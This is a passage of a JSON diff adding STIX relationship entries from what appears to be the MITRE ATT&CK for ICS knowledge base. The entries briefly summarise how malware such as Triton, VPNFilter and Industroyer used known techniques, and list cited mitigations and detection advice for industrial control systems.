(Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016)", + "relationship_type": "uses", + "source_ref": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe", + "target_ref": "attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c64f2ed2-f7a7-4333-b0d3-d687ffb7ad6b", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Department of Homeland Security October 2009", + "description": "Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-19T21:23:30.482Z", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. 
Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of gold-copy back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "target_ref": "attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--868db512-b897-4a54-ae56-ac78f6c93a14", + "created": "2022-09-28T20:29:18.027Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + }, + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. 
Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.443Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can use a Telnet session to load a malware implant on Omron PLCs.(Citation: CISA-AA22-103A)(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c84e39ab-30c1-40e3-95a8-fcbb271e913c", + "created": "2022-05-06T17:47:21.168Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Carl Hurd March 2019", + "description": "Carl Hurd 2019, March 26 VPNFilter Deep Dive Retrieved. 2019/03/28 ", + "url": "https://www.youtube.com/watch?v=yuZazP22rpI" + }, + { + "source_name": "William Largent June 2018", + "description": "William Largent 2018, June 06 VPNFilter Update - VPNFilter exploits endpoints, targets new devices Retrieved. 2019/03/28 ", + "url": "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:31:07.308Z", + "description": "The [VPNFilter](https://attack.mitre.org/software/S1010)'s ssler module configures the device's iptables to redirect all traffic destined for port 80 to its local service listening on port 8888. 
Any outgoing web requests on port 80 are now intercepted by ssler and can be inspected by the ps module and manipulated before being sent to the legitimate HTTP service. (Citation: William Largent June 2018) (Citation: Carl Hurd March 2019)", + "relationship_type": "uses", + "source_ref": "malware--6108f800-10b8-4090-944e-be579f01263d", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e1461f8d-6a16-4526-ac0b-0acd27ae8065", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:40:47.334Z", + "description": "Collect file hashes. Monitor for file names that do not match their expected hash. Perform file monitoring. Files with known names but in unusual locations are suspect. Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters\"\\u202E\", \"[U+202E]\", and \"%E2%80%AE\". 
For added context on adversary procedures and background see [Masquerading](https://attack.mitre.org/techniques/T1036) and applicable sub-techniques.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--238f967a-0c29-4aa3-bbb5-3dc593473bbf", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Microsoft Security Response Center August 2017", + "description": "Microsoft Security Response Center 2017, August Moving Beyond EMET II Windows Defender Exploit Guard Retrieved. 2020/09/25 ", + "url": "https://msrc-blog.microsoft.com/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/" + }, + { + "source_name": "Wikipedia", + "description": "Wikipedia Microsoft Security Response Center 2017, August Moving Beyond EMET II Windows Defender Exploit Guard Retrieved. 2020/09/25 Control-flow integrity Retrieved. 2020/09/25 ", + "url": "https://en.wikipedia.org/wiki/Control-flow_integrity" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:19:12.382Z", + "description": "Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: Microsoft Security Response Center August 2017) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. 
(Citation: Wikipedia) Many of these protections depend on the architecture and target application binary for compatibility and may not work for all software or services targeted.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--49363b74-d506-4342-bd63-320586ebadb9", + "target_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--147c2158-b2af-4d88-9d59-594c67a9200e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.204Z", + "relationship_type": "mitigates", + "description": "Protocols used for control functions should provide authenticity through MAC functions or digital signatures. 
If not, utilize bump-in-the-wire devices or VPNs to enforce communication authenticity between devices that are not capable of supporting this (e.g., legacy controllers, RTUs).\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--758d5818-f919-4a6b-9dc2-a212595a11bd", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:49:30.320Z", + "description": "Authenticate connections fromsoftware and devices to prevent unauthorized systems from accessing protected management functions.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9d75333b-2542-4899-923f-55dc1e077a51", + "created": "2022-09-27T16:03:41.224Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:45:52.592Z", + "description": "Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. 
Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning PowerShell).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--668f8c4b-225a-4287-ac5b-7717a4f75b5d", + "created": "2023-03-10T20:32:02.472Z", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-10T20:32:02.472Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed for changing configurations in the PDS computers. 
This ultimately led to 800,000 liters of raw sewage being spilled out into the community.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b349ef5f-4a05-4eef-afe4-1543b8c832fa", + "type": "relationship", + "created": "2017-05-31T21:33:27.070Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html", + "description": "Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.", + "source_name": "iSIGHT Sandworm 2014" + }, + { + "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf", + "description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.", + "source_name": "F-Secure BlackEnergy 2014" + }, + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020." + }, + { + "source_name": "UK NCSC Olympic Attacks October 2020", + "url": "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", + "description": "UK NCSC. (2020, October 19). 
UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020." + }, + { + "source_name": "Secureworks IRON VIKING ", + "url": "https://www.secureworks.com/research/threat-profiles/iron-viking", + "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020." + } + ], + "modified": "2022-02-28T17:02:50.401Z", + "description": "(Citation: iSIGHT Sandworm 2014)(Citation: F-Secure BlackEnergy 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: Secureworks IRON VIKING )", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0f8a6c14-1050-404a-bb6e-4fe107d5b6cd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.197Z", + "relationship_type": "mitigates", + "description": "Devices should authenticate all messages between master and outstation assets.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--f347b4fe-d829-427d-851a-fff3393441db", + "created": "2021-04-12T07:57:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik August 2019", + 
"description": "Joe Slowik 2019, August 15 CRASHOVERRIDE: Reassessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack Retrieved. 2019/10/22 ", + "url": "https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-14T20:00:00.650Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) contained a module which leveraged a vulnerability in the Siemens SIPROTEC relays (CVE-2015-5374) to create a Denial of Service against automated protective relays. (Citation: Joe Slowik August 2019)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--2bb4d762-bf4a-4bc3-9318-15cc6a354163", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b8d484f3-85e7-4208-8ae4-72f0e055a290", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:45:17.457Z", + "description": "Monitor for network traffic originating from unknown/unexpected systems.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": 
"relationship--5be1f2b1-75fd-4e7e-901b-495cee4ab5ad", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.209Z", + "relationship_type": "mitigates", + "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.\n", + "source_ref": "course-of-action--3172222b-4983-43f7-8983-753ded4f13bc", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0c9ed09d-4ce3-4e65-845a-c21dcc5d956f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.070Z", + "relationship_type": "mitigates", + "description": "Provide an alternative method for sending critical commands message to outstations, this could include using radio/cell communication to send messages to a field technician that physically performs the control function.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--5e099568-fb5c-4f58-af7e-4e1b7a9d1128", + "created": "2021-04-12T18:49:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Tom Fakterman August 2019", + "description": "Tom Fakterman 
2019, August 05 Sodinokibi: The Crown Prince of Ransomware Retrieved. 2021/04/12 ", + "url": "https://www.cybereason.com/blog/the-sodinokibi-ransomware-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:05:04.619Z", + "description": "[REvil](https://attack.mitre.org/software/S0496) searches for whether the Ahnlab autoup.exe service is running on the target system and injects its payload into this existing process. (Citation: Tom Fakterman August 2019)", + "relationship_type": "uses", + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f6ff74c2-d088-4252-a8e0-189574863765", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T16:44:46.032Z", + "description": "Communication authenticity will ensure that any messages tampered with through AiTM can be detected, but cannot prevent eavesdropping on these. 
In addition, providing communication authenticity around various discovery protocols, such as DNS, can be used to prevent various AiTM procedures.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--31bf1721-78a2-4b6c-b325-5c44dc02ea33", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Eduard Kovacs March 2018", + "description": "Eduard Kovacs 2018, March 1 Five Threat Groups Target Industrial Systems: Dragos Retrieved. 2020/01/03 ", + "url": "https://www.securityweek.com/five-threat-groups-target-industrial-systems-dragos" + }, + { + "source_name": "Novetta Threat Research Group February 2016", + "description": "Novetta Threat Research Group 2016, February 24 Operation Blockbuster: Unraveling the Long Thread of the Sony Attack Retrieved. 2016/02/25 ", + "url": "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:15:30.732Z", + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) has been observed targeting organizations using spearphishing documents with embedded malicious payloads. (Citation: Novetta Threat Research Group February 2016) Highly targeted spear phishing campaigns have been conducted against a U.S. electric grid company. 
(Citation: Eduard Kovacs March 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c9065f74-556d-4728-8072-f96642e70316", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-12T18:59:24.739Z", + "modified": "2022-05-06T17:47:24.187Z", + "relationship_type": "mitigates", + "description": "Access Management technologies can help enforce authentication on critical remote service, examples include, but are not limited to, device management services (e.g., telnet, SSH), data access servers (e.g., HTTP, Historians), and HMI sessions (e.g., RDP, VNC).\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--ccc67bb3-acc3-4294-81b3-4a0d972f2dd7", + "created": "2021-04-13T12:08:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Jos Wetzels January 2018", + "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 
2019/10/22 ", + "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:28:11.304Z", + "description": "[Triton](https://attack.mitre.org/software/S1009)'s injector, inject.bin, changes the function pointer of the 'get main processor diagnostic data' TriStation command to the address of imain.bin so that it is executed prior to the normal handler. (Citation: Jos Wetzels January 2018)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b960c5ed-1ea8-4dde-9203-c02d291d3bc6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.222Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 
2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--154de746-5ea2-43b4-97b2-221b2433cbde", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:48:49.308Z", + "description": "Monitor ICS automation network protocols for information that an asset has been placed into Firmware Update Mode.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3ab912a4-70aa-45f8-b2ef-57113dde2cfa", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.237Z", + "relationship_type": "mitigates", + "description": "Do not inherently rely on the authenticity provided by the network/link layer (e.g., 802.11, LTE, 802.15.4), as link layer equipment may have long lifespans and protocol vulnerabilities may not be easily patched. Provide defense-in-depth by implementing authenticity within the associated application-layer protocol, or through a network-layer VPN. 
(Citation: CISA March 2010) Furthermore, ensure communication schemes provide strong replay protection, employing techniques such as timestamps or cryptographic nonces.\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "external_references": [ + { + "source_name": "CISA March 2010", + "description": "CISA 2010, March 11 https://us-cert.cisa.gov/ncas/tips/ST05-003 Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/ncas/tips/ST05-003" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--808c57e7-72ef-4860-b9ea-8ea072e2385a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.098Z", + "relationship_type": "mitigates", + "description": "Protocols used for control functions should provide authenticity through MAC functions or digital signatures. 
